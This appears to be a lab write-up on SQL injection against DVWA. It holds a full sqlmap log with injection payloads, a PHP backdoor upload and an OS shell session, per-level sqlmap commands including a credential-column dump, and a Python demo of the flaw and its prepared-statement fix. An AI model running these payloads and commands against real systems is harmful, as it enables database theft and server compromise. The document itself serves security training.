SQL injection with echoed output - notes
Posted: 2021-07-01 10:21:17
sqlmap --os-shell session against the DVWA target, resuming the injection points found in an earlier run:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.4.16#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:42:39

[09:42:39] [INFO] resuming back-end DBMS 'mysql'
[09:42:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=1' OR NOT 1977=1977#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5)-- peqj&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit
---
[09:42:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:42:39] [INFO] going to use a web backdoor for command prompt
[09:42:39] [INFO] fingerprinting the back-end DBMS operating system
[09:42:39] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[09:42:43] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA
[09:42:51] [WARNING] unable to automatically parse any web server path
[09:42:51] [INFO] trying to upload the file stager on 'C:/phpStudy/WWW/DVWA/' via LIMIT 'LINES TERMINATED BY' method
[09:42:51] [INFO] heuristics detected web page charset 'ascii'
[09:42:51] [INFO] the file stager has been successfully uploaded on 'C:/phpStudy/WWW/DVWA/' - http://192.168.3.88:80/DVWA/tmpummkl.php
[09:42:52] [INFO] the backdoor has been successfully uploaded on 'C:/phpStudy/WWW/DVWA/' - http://192.168.3.88:80/DVWA/tmpbhbmv.php
[09:42:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] y
[09:42:56] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
 Volume in drive C is BOOTCAMP
 Volume Serial Number is D89B-813F

 Directory of C:\phpStudy\WWW\DVWA

2017-05-16  09:42    <DIR>          .
2017-05-16  09:42    <DIR>          ..
2015-10-05  15:51               500 .htaccess
2015-10-05  15:51             3,845 about.php
2015-10-05  15:51             7,229 CHANGELOG.md
2017-04-25  09:18    <DIR>          config
2015-10-05  15:51            33,107 COPYING.txt
2017-04-25  09:18    <DIR>          docs
2017-04-25  09:18    <DIR>          dvwa
2017-04-25  09:18    <DIR>          external
2015-10-05  15:51             1,406 favicon.ico
2017-04-25  09:18    <DIR>          hackable
2015-10-05  15:51               895 ids_log.php
2015-10-05  15:51             4,389 index.php
2015-10-05  15:51             1,869 instructions.php
2015-10-05  15:51             3,522 login.php
2015-10-05  15:51               414 logout.php
2015-10-05  15:51               148 php.ini
2015-10-05  15:51               199 phpinfo.php
2015-10-05  15:51             7,651 README.md
2015-10-05  15:51                26 robots.txt
2015-10-05  15:51             4,686 security.php
2015-10-05  15:51             2,364 setup.php
2017-05-04  20:59               466 test.php
2017-05-16  09:42               908 tmpbhbmv.php
2017-05-16  09:42               727 tmpummkl.php
2017-05-15  21:11                29 ttt.php
2017-04-25  09:18    <DIR>          vulnerabilities
              20 File(s)         74,380 bytes
               8 Dir(s)  18,391,883,776 bytes free
---
os-shell> x
[09:43:02] [INFO] cleaning up the web files uploaded
[09:43:02] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[09:43:02] [INFO] fetched data logged to text files under 'C:\Users\zptxwd\.sqlmap\output\192.168.3.88'

[*] shutting down at 09:43:03

Two things worth noticing in that run. sqlmap could not work out the document root by itself, so the writable directory C:\phpStudy\WWW\DVWA had to be supplied by hand, and it then wrote its PHP stager and backdoor with the MySQL LIMIT 'LINES TERMINATED BY' file-write technique, which only works when the database account is allowed to write files into the web root. The two tmp*.php files in the dir output are that stager and backdoor; sqlmap reports cleaning them up at exit, and that should be confirmed on the target afterwards.

Automated injection with sqlmap

DVWA's normal business logic: look up the record for the submitted User ID in the database and echo it to the web page, with a query of the form

    select firstname,surname from XXX where user_id='...'

Note: when the single quote is escaped, a string can still be supplied as a MySQL hex literal (0x...), which needs no quotes at all. This only helps where the injected value is not itself wrapped in quotes, as in the unquoted numeric context of the medium level; sqlmap's own payloads above use the same trick for their 0x716a767171 / 0x7178767171 marker strings.

low
Manual test: 1' or '1=1 works, because the id is dropped into a quoted literal and the injected quote closes it.
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low"

medium
The id is now sent as a POST parameter. Intercept the request and change the post parameter to 1 or 1=1; no quotes are needed, since the value is used unquoted and a quote would be escaped anyway.
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium"
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium" -D dvwa -T users -C "user,password" --dump

high
The page where the id is entered is not the page where the result is echoed, so the query location and the echo location differ (a second-order injection). Point sqlmap at the page where the result shows up with --second-order:
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;security=high" --second-order "http://192.168.3.88/dvwa/vulnerabilities/sqli/session-input.php#"

Preventing SQL injection: check the data type of id, and use prepared statements with the id bound as a parameter. Prepared statements and stored procedures both work, with the caveat that a stored procedure only helps when it does not build SQL dynamically from its arguments.
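Added example, not code from the original notes or from DVWA: a small model of the low and medium query construction described above and of the prevention advice. It shows why 1' or '1=1 works at low, why the same payload is broken once quotes are escaped, why the unquoted numeric context at medium still accepts 1 or 1=1 or a MySQL hex literal, and how a type check plus a bound parameter closes the hole. The users table, the sample rows and the escape_string() stand-in for DVWA's escaping are all constructed for this example, and the queries run against SQLite so it works offline.

```python
"""
Model of DVWA-style query building (low, medium) and the hardened form.
Everything here is constructed for the example: the users table is a
stand-in for dvwa.users, escape_string() only approximates DVWA's quote
escaping, and SQLite stands in for MySQL.
"""
import re
import sqlite3

# Constructed sample data standing in for DVWA's users table.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table users (user_id integer, first_name text, last_name text)")
    con.executemany("insert into users values (?, ?, ?)", SAMPLE_USERS)
    return con


def escape_string(value):
    """Stand-in for mysql_real_escape_string: neutralise the single quote so
    it cannot close a string literal. MySQL puts a backslash in front of it;
    SQLite needs the quote doubled. The effect on the injection is the same."""
    return value.replace("'", "''")


def query_low(user_id):
    # DVWA low: the raw input is dropped into a quoted literal.
    return f"select first_name, last_name from users where user_id = '{user_id}'"


def query_medium(user_id):
    # DVWA medium: the input is escaped but used unquoted (numeric context),
    # so a payload that needs no quote at all goes through untouched.
    return f"select first_name, last_name from users where user_id = {escape_string(user_id)}"


def mysql_hex(text):
    """MySQL reads 0x... as a string literal: a way to supply a string
    without a single quote (the HEX encoding note)."""
    return "0x" + text.encode().hex()


def rows_for(sql):
    """Run an injected query; None means the DBMS rejected it (syntax error)."""
    try:
        return make_db().execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def is_valid_id(user_id):
    # Prevention step 1: check the data type of id before it goes anywhere.
    return re.fullmatch(r"\d+", user_id) is not None


def lookup_safe(user_id):
    """Prevention step 2: bind the id as a parameter (prepared statement),
    so the value is data to the DBMS and is never parsed as SQL."""
    if not is_valid_id(user_id):
        raise ValueError("user_id must be a decimal integer")
    con = make_db()
    return con.execute(
        "select first_name, last_name from users where user_id = ?", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    print("low, normal:    ", rows_for(query_low("1")))
    print("low, injected:  ", rows_for(query_low("1' or '1=1")))
    # None: the escaped quote leaves the SQL syntactically broken.
    print("medium, quoted: ", rows_for(query_medium("1' or '1=1")))
    print("medium, numeric:", rows_for(query_medium("1 or 1=1")))
    # The hex literal survives escaping untouched. MySQL would compare
    # first_name with the string 'admin'; SQLite treats 0x... as an integer,
    # so this one is only printed, not executed.
    print("medium, hex:    ", query_medium("1 or first_name=" + mysql_hex("admin")))
    print("safe, normal:   ", lookup_safe("1"))
    print("safe, injected: ", is_valid_id("1 or 1=1"))
```

The escaping stand-in uses SQLite's quote doubling rather than MySQL's backslash, but the outcome is the one the notes describe: at medium the quoted payload dies as a syntax error while the unquoted 1 or 1=1 returns every row, and the hex literal contains nothing for the escaping to touch. The hardened lookup rejects both payloads on the type check, and even an input that passed it would be bound as a value rather than spliced into the statement.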